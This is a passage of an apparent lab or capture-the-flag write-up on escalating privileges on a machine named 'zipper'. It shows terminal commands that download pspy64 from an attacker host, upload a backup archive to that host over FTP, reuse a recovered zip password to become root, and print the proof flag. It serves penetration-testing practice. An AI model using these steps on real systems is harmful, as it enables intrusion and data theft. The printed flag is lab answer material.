Priv Esc
www-data@zipper:/home$ cat /etc/crontab
www-data@zipper:/dev/shm$ wget 192.168.45.168/pspy
--2024-09-09 11:48:04-- http://192.168.45.168/pspy
Connecting to 192.168.45.168:80... connected.
HTTP request sent, awaiting response... 404 File not found
2024-09-09 11:48:04 ERROR 404: File not found.
www-data@zipper:/dev/shm$ wget 192.168.45.168/pspy64
--2024-09-09 11:48:08-- http://192.168.45.168/pspy64
Connecting to 192.168.45.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================>] 2.96M 6.36MB/s in 0.5s
2024-09-09 11:48:08 (6.36 MB/s) - ‘pspy64’ saved [3104768/3104768]
www-data@zipper:/dev/shm$ chmod +x pspy64
******************
www-data@zipper:/dev/shm$ cd /opt
www-data@zipper:/opt$ ls
backup.sh backups
www-data@zipper:/opt$ cd backups
www-data@zipper:/opt/backups$ ls
backup.log backup.zip
$ python -m pyftpdlib --write -p 21
www-data@zipper:/opt/backups$ ftp 192.168.45.168
Connected to 192.168.45.168.
220 pyftpdlib 1.5.10 ready.
Name (192.168.45.168:www-data): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put backup.zip
local: backup.zip remote: backup.zip
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
1538 bytes sent in 0.00 secs (81.4862 MB/s)
ftp> exit
221 Goodbye.
Ran pspy64 again to watch process activity:
WildCardsGoingWild
adot@kali:~/oscp/pg/zipper/privesc$ cat enox.zip
/root/secret
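There was nothing special in the backups themselves, so I just tried `su root` with the zip password. It worked because root's login password was the same as the zip password, i.e. credential reuse.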
www-data@zipper:/dev/shm$ su root
Password: WildCardsGoingWild
root@zipper:/dev/shm# whoami
root
root@zipper:/dev/shm# cat /root/proof.txt
a244b4ca5153c45dc9f92eee77695486
root@zipper:/dev/shm# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:bf:47:1a brd ff:ff:ff:ff:ff:ff
inet 192.168.185.229/24 brd 192.168.185.255 scope global ens160
valid_lft forever preferred_lft forever